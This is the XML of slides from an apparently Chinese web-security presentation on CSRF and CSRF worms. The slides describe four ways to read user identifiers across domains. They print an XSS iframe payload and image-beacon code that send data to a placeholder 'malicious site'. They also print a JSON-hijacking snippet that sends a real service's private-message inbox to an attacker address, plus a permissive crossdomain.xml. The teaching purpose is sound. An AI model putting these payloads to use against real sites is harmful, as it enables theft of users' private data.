      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11267" name="内容占位符 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="928688" y="1857375"/>
            <a:ext cx="7215187" cy="3929063"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>同域</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>攻击。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>同域内获取数据几乎没任何限制。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>跨域</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>攻击。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>跨域获取数据的几种方法：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>、服务端代理技术</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>JSON Hijacing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Flash AsctionScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>crossdomain.xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>要获取的关键数据是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>唯一标识</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>唯一的、无法全部预知的</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>用户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>、用户昵称、用户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>email</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>、用户个人页面地址等。</a:t>
            </a:r>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内容</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48131" name="内容占位符 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="928688" y="1857375"/>
            <a:ext cx="7215187" cy="3929063"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>模型</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>攻击与基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>的攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>蠕虫模型</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>、修补建议</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Q&amp;A</a:t>
            </a:r>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使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11267" name="内容占位符 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="928688" y="1857375"/>
            <a:ext cx="7215187" cy="3929063"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>使用目标站点上的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>漏洞：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>&lt;iframe width=0 height=0 src=‘http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>目标站点</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>/search.php?k=“&gt;&lt;script src=http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>恶意站点</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>/get.js&gt;&lt;/script&gt;’&gt;&lt;/iframe&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>恶意站点</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>/get.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>的代码是：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>//use DOM method to get your data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>new Image(). src=‘http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>恶意站点</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>/do.php?data=‘+yourdata;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>恶意站点的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>do.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>文件接收唯一标识等数据。该唯一标识可以是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>中的或是目标站点</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>对应的内容中的。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使用服务端代理</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76803" name="内容占位符 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="928688" y="1857375"/>
            <a:ext cx="7215187" cy="3929063"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>使用服务端代理技术：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>asp/asp.net</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>服务端的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>XMLHTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>file_get_contents</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>等等。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>无法获取页面内容中的唯一标识，只能获取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>中的唯一标识：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>来获取目标站点的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>r = Request.ServerVariables(“HTTP_REFERER”)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>可能为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>目标站点</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>/space/user/?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>id=2343</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>，其中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>2343</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>就是唯一标识。</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使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>JSON Hijacking</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11267" name="内容占位符 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="928688" y="1857375"/>
            <a:ext cx="7215187" cy="3929063"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>JSON Hijacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>技术：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>目标站点使用了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>JSON</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>数据传输用户私有数据。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>该私有数据内包含我们需要的唯一标识等信息。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>相关代码：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nn-NO" altLang="zh-CN" smtClean="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nn-NO" altLang="zh-CN" smtClean="0"/>
              <a:t>function hijack(o){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>//use DOM method to get your data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nn-NO" altLang="zh-CN" smtClean="0"/>
              <a:t>new Image().src="http://192.168.1.2/JSONHiJack.asp?hi="+escape(data);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nn-NO" altLang="zh-CN" smtClean="0"/>
              <a:t>}&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nn-NO" altLang="zh-CN" smtClean="0"/>
              <a:t>&lt;script src=http://api.fanfou.com/private_messages/inbox.json?callback=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>hijack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nn-NO" altLang="zh-CN" smtClean="0"/>
              <a:t>&amp;count=2&gt;&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>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使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Flash</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11267" name="内容占位符 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="928688" y="1857375"/>
            <a:ext cx="7215187" cy="3929063"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>Flash ActionScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>脚本：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>目标站点下必须存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>crossdomain.xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>文件。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>crossdomain.xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>中的配置允许其他域的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>AS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>脚本进行跨域请求。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>&lt;?xml version="1.0"?&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>&lt;cross-domain-policy&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>&lt;allow-access-from domain="*" /&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>&lt;/cross-domain-policy&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>相关代码：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>import flash.net.*;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>var _l = new URLLoader(new URLRequest(“http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>目标站点</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>/"));</a:t>
            </a:r>
          </a:p>
